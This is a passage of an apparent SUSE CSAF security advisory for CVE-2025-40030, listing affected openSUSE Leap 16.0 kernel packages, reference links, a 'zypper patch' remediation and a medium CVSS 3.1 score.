"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40030",
"url": "https://www.suse.com/security/cve/CVE-2025-40030"
},
{
"category": "external",
"summary": "SUSE Bug 1252773 for CVE-2025-40030",
"url": "https://bugzilla.suse.com/1252773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
